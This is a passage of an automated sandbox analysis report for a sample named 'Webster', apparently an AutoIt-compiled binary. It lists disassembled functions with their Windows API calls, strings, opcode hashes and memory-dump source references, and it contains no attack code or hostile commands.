                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                  • API String ID: 4237274167-1221869570
                                                                                  • Opcode ID: 0e727e996a479ddfd44bc41a7c0600c04186275093c842fe335786021c78c56e
                                                                                  • Instruction ID: da885326d52322ccac5fe03a72c3a093ff5b3c82f83baf7505903b8ce4f8b55e
                                                                                  • Opcode Fuzzy Hash: 0e727e996a479ddfd44bc41a7c0600c04186275093c842fe335786021c78c56e
                                                                                  • Instruction Fuzzy Hash: 6A91AD706083059FCB00EF64C58096ABBF5EF89754F14896EF98A8B3A1DB30ED45CB52
                                                                                  Function 00AE323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A9436A: _wcscpy.LIBCMT ref: 00A9438D
                                                                                  • _memset.LIBCMT ref: 00AE332E
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AE335D
                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AE3410
                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AE343E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                  • String ID: 0
                                                                                  • API String ID: 4152858687-4108050209
                                                                                  • Opcode ID: d05b0dd05cab0f1a51a41b08545944c2bf477012cf68412923697393a18fc0a0
                                                                                  • Instruction ID: 8af6c38b236d61ccbd0df0b5461c3128fc89eb17d7b00b328a4fc7da7a22a8ad
                                                                                  • Opcode Fuzzy Hash: d05b0dd05cab0f1a51a41b08545944c2bf477012cf68412923697393a18fc0a0
                                                                                  • Instruction Fuzzy Hash: 42510332208381ABCF12AF2AC949A6BB7E8EF55320F04492DF895D71D1DB70CE44CB52
                                                                                  Function 00AE2EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00AE2F67
                                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00AE2F83
                                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00AE2FC9
                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B47890,00000000), ref: 00AE3012
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 1173514356-4108050209
                                                                                  • Opcode ID: c471b026fcf219d63153ddc4daed3df220df9c614773dc0160ebd31e503bd9b3
                                                                                  • Instruction ID: feb8ead44e348ddfb6797f08f918d8f526f96e1227b8109e2359a5d2d0cbc1ba
                                                                                  • Opcode Fuzzy Hash: c471b026fcf219d63153ddc4daed3df220df9c614773dc0160ebd31e503bd9b3
                                                                                  • Instruction Fuzzy Hash: 5841C6322043819FDB20DF26C889B5ABBE9FF85310F144A5DF5A6972D1DB70EA05CB52
                                                                                  Function 00AFDE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00AFDEAE
                                                                                    • Part of subcall function 00A91462: _memmove.LIBCMT ref: 00A914B0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharLower_memmove
                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                  • API String ID: 3425801089-567219261
                                                                                  • Opcode ID: 8bf00707e296d0c31cd000e9bfcace3bfb62f346b50022884f45f7524524463d
                                                                                  • Instruction ID: 8a0b91f5bc3d197858df29ac8f8a68f92e94698c45ac2c61885520ff766fa42c
                                                                                  • Opcode Fuzzy Hash: 8bf00707e296d0c31cd000e9bfcace3bfb62f346b50022884f45f7524524463d
                                                                                  • Instruction Fuzzy Hash: DA31AF71A0021AAFCF11EF94CA80DFEB7B5FF15310B108669F966A72D1DB31A905CB80
                                                                                  Function 00AD9A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00ADB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00ADB7BD
                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AD9ACC
                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AD9ADF
                                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AD9B0F
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$_memmove$ClassName
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 365058703-1403004172
                                                                                  • Opcode ID: 7e6999f9c1b63792310b2451816c8f48a82c92f26d35f89344e6e8e235d46234
                                                                                  • Instruction ID: 87b7b29372d0578f06191f0f09bf68684bee2f90174d1e1f3174c032a5cd8d53
                                                                                  • Opcode Fuzzy Hash: 7e6999f9c1b63792310b2451816c8f48a82c92f26d35f89344e6e8e235d46234
                                                                                  • Instruction Fuzzy Hash: 4721E471A41104BEDF14ABA4DC45CFFB7BCDF513A0F61411BF826972E1DB3489469660
                                                                                  Function 00B06A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A82111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
                                                                                    • Part of subcall function 00A82111: GetStockObject.GDI32(00000011), ref: 00A82163
                                                                                    • Part of subcall function 00A82111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D
                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B06A86
                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00B06A8D
                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B06AA2
                                                                                  • DestroyWindow.USER32(?), ref: 00B06AAA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                  • String ID: SysAnimate32
                                                                                  • API String ID: 4146253029-1011021900
                                                                                  • Opcode ID: e0ed57db6932d01a3270d12b04f8713dc1abae1c29fcd53e96844186743670ef
                                                                                  • Instruction ID: be5299fd61bcc77fdbacbd5c470e7eb6a271a1c7cd4dde7befccacbb2cd7ee4b
                                                                                  • Opcode Fuzzy Hash: e0ed57db6932d01a3270d12b04f8713dc1abae1c29fcd53e96844186743670ef
                                                                                  • Instruction Fuzzy Hash: 8C21BB71300205AFEF10AEA49C80EBB7BE8EB49324F509258FA50A30D1D7718CA09760
                                                                                  Function 00AE7357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00AE7377
                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AE73AA
                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00AE73BC
                                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00AE73F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHandle$FilePipe
                                                                                  • String ID: nul
                                                                                  • API String ID: 4209266947-2873401336
                                                                                  • Opcode ID: 095ad592bcd39847af4025261368a9d25c85aefadbc63d8315cffd570a69a889
                                                                                  • Instruction ID: e10f4f3817ee84574df0a4c9714a220c53a76df0256bcf63bc7af4a8a1a1ccfd
                                                                                  • Opcode Fuzzy Hash: 095ad592bcd39847af4025261368a9d25c85aefadbc63d8315cffd570a69a889
                                                                                  • Instruction Fuzzy Hash: 4E218174508347ABDB209F6ADC05A9E7BA5AF44720F204A19FDA0DB2D0DBB0DC50DB50
                                                                                  Function 00AE7425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00AE7444
                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AE7476
                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00AE7487
                                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00AE74C1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHandle$FilePipe
                                                                                  • String ID: nul
                                                                                  • API String ID: 4209266947-2873401336
                                                                                  • Opcode ID: ec54b848bf6765016d17f7673cb3baa7dc4aa3805b312e12fbfe69208dc9e5ec
                                                                                  • Instruction ID: 40662fa1649d856fde4d036a9e2d552cb2b4805ce40bb9da2f03b922eea13f40
                                                                                  • Opcode Fuzzy Hash: ec54b848bf6765016d17f7673cb3baa7dc4aa3805b312e12fbfe69208dc9e5ec
                                                                                  • Instruction Fuzzy Hash: 9E21B6715083869BDB20AF6A9C44E9D7BF8AF55730F204B19FDA0D72D0DB709851C750
                                                                                  Function 00AEB283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00AEB297
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00AEB2EB
                                                                                  • __swprintf.LIBCMT ref: 00AEB304
                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00B10980), ref: 00AEB342
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                  • String ID: %lu
                                                                                  • API String ID: 3164766367-685833217
                                                                                  • Opcode ID: a10cac855504bdf65b804e59bd831bfae328118afaa00438f13afe62d0c9bb36
                                                                                  • Instruction ID: ba314bc375b1d3f088d5e49e2f611857807e4f6ac937737f6b7a682ca2e30c0d
                                                                                  • Opcode Fuzzy Hash: a10cac855504bdf65b804e59bd831bfae328118afaa00438f13afe62d0c9bb36
                                                                                  • Instruction Fuzzy Hash: 37214135A00109AFCB10EF65C985DEEBBF8EF49704B508069F905EB252DB71EE45CB61
                                                                                  Function 00ADAC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                    • Part of subcall function 00ADAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ADAA6F
                                                                                    • Part of subcall function 00ADAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADAA82
                                                                                    • Part of subcall function 00ADAA52: GetCurrentThreadId.KERNEL32 ref: 00ADAA89
                                                                                    • Part of subcall function 00ADAA52: AttachThreadInput.USER32(00000000), ref: 00ADAA90
                                                                                  • GetFocus.USER32 ref: 00ADAC2A
                                                                                    • Part of subcall function 00ADAA9B: GetParent.USER32(?), ref: 00ADAAA9
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00ADAC73
                                                                                  • EnumChildWindows.USER32(?,00ADACEB), ref: 00ADAC9B
                                                                                  • __swprintf.LIBCMT ref: 00ADACB5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                                                  • String ID: %s%d
                                                                                  • API String ID: 1941087503-1110647743
                                                                                  • Opcode ID: b29d675ee51e0bab5cf378c2566568b18b5cdd81b6728d57371d54747f756d79
                                                                                  • Instruction ID: 71e0c70c375cd2b7a58e8295d67cb6a32a751a95b483aba3de646e52bc79fdb7
                                                                                  • Opcode Fuzzy Hash: b29d675ee51e0bab5cf378c2566568b18b5cdd81b6728d57371d54747f756d79
                                                                                  • Instruction Fuzzy Hash: 5F11E775210205ABCF11BFA0CE85FEA37ACAB54710F008076FD0A9A252CA745945DB71
                                                                                  Function 00AE22E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00AE2318
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper
                                                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                  • API String ID: 3964851224-769500911
                                                                                  • Opcode ID: 9acace8dfa088530c946eadc7901da42006cf9b30bc573cc9752201a78290db8
                                                                                  • Instruction ID: 2fd0fd576697610510e16b1838216ad3aaa16ce35ac7b2e6b5df29e2eddf86c2
                                                                                  • Opcode Fuzzy Hash: 9acace8dfa088530c946eadc7901da42006cf9b30bc573cc9752201a78290db8
                                                                                  • Instruction Fuzzy Hash: FF117C719101199FCF00EF94C9919EEB3B8FF26344F6080A8E810A72A1EB326D06CF40
                                                                                  Function 00AFF23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AFF2F0
                                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AFF320
                                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00AFF453
                                                                                  • CloseHandle.KERNEL32(?), ref: 00AFF4D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                  • String ID:
                                                                                  • API String ID: 2364364464-0
                                                                                  • Opcode ID: da003bbb58630d70544f1b2ac2d960e15d113ab082e14fd013f6274a69543f88
                                                                                  • Instruction ID: c4e0577177312a0bd9424c21b717a0a0f46268b5c1b0687a5012c6f3e53f3004
                                                                                  • Opcode Fuzzy Hash: da003bbb58630d70544f1b2ac2d960e15d113ab082e14fd013f6274a69543f88
                                                                                  • Instruction Fuzzy Hash: C88184716043019FD720EF68D986F6EB7E5AF48710F14891DFA99DB392EBB0AC408B51
                                                                                  Function 00B00697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77
                                                                                    • Part of subcall function 00B0147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B0040D,?,?), ref: 00B01491
                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0075D
                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B0079C
                                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B007E3
                                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00B0080F
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B0081C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 3440857362-0
                                                                                  • Opcode ID: a718e0c02b4d4cc455a7c94385c6dbee1e2ecf20362dbef2686a7ff7155d81b9
                                                                                  • Instruction ID: 23fd003b36390aed1366f480d901e21cb5e67fc74f68f9ba42044d8d3b6b5fb1
                                                                                  • Opcode Fuzzy Hash: a718e0c02b4d4cc455a7c94385c6dbee1e2ecf20362dbef2686a7ff7155d81b9
                                                                                  • Instruction Fuzzy Hash: F7516A71218205AFC704EF64C981FAABBE9FF88304F40895DF596872A1EB30ED04CB52
                                                                                  Function 00AEEBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AEEC62
                                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00AEEC8B
                                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AEECCA
                                                                                    • Part of subcall function 00A84D37: __itow.LIBCMT ref: 00A84D62
                                                                                    • Part of subcall function 00A84D37: __swprintf.LIBCMT ref: 00A84DAC
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AEECEF
                                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AEECF7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 1389676194-0
                                                                                  • Opcode ID: f5e2f957c43055dd4d41a4b823c58acb9999de86643f614418c4559ff3b77d31
                                                                                  • Instruction ID: c7409af63e3bbe9d49ce873eea889a85985b085d50e0c1b81f6f58d0937a00af
                                                                                  • Opcode Fuzzy Hash: f5e2f957c43055dd4d41a4b823c58acb9999de86643f614418c4559ff3b77d31
                                                                                  • Instruction Fuzzy Hash: 45512A35A00119DFCB01EF65CA85EAEBBF5EF0D314B148099E809AB3A1DB31ED51DB90
                                                                                  Function 00B0A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
